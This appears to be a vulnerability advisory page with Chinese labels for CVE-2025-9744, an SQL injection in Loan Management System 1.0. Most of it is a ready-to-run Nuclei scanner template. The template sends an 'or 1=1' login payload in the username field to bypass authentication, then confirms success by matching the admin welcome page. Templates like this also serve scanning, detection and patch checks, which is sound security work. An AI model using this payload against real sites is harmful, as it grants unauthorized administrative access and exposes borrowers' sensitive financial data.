CVE-2025-9744: Loan Management System 1.0 - SQL Injection

日期: 2025-08-01 | 影响软件: Loan Management System | POC: 已公开

漏洞描述

Loan Management System 1.0 contains a SQL injection vulnerability via the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2025-9744

info:
  name: Loan Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    Loan Management System 1.0 contains a SQL injection vulnerability via the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.exploit-db.com/exploits/50402
    - https://packetstormsecurity.com/files/167860/Loan-Management-System-1.0-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9744
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-9744
    epss-score: 0.01829
    epss-percentile: 0.82332
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,auth-bypass,cms,packetstorm,edb,loancms,sqli,vuln

http:
  - raw:
      - |
        POST /ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
      - |
        GET /index.php?page=home HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'window.start_load'
          - 'Welcome back Admin'
          - 'Loan Management System'
        condition: and

      - type: word
        part: body
        words:
          - 'login-form'
        negative: true
# digest: 4a0a00473045022100d2600cdb093860e5f4b0916681a055e7103af2c63028cdc455efa3f1e736e2930220223d468ffa4572bb7847fd61cf0788e744866651e6a5e2b0b498200be5d0c005:922c64590222798bb761d5b6d8e72950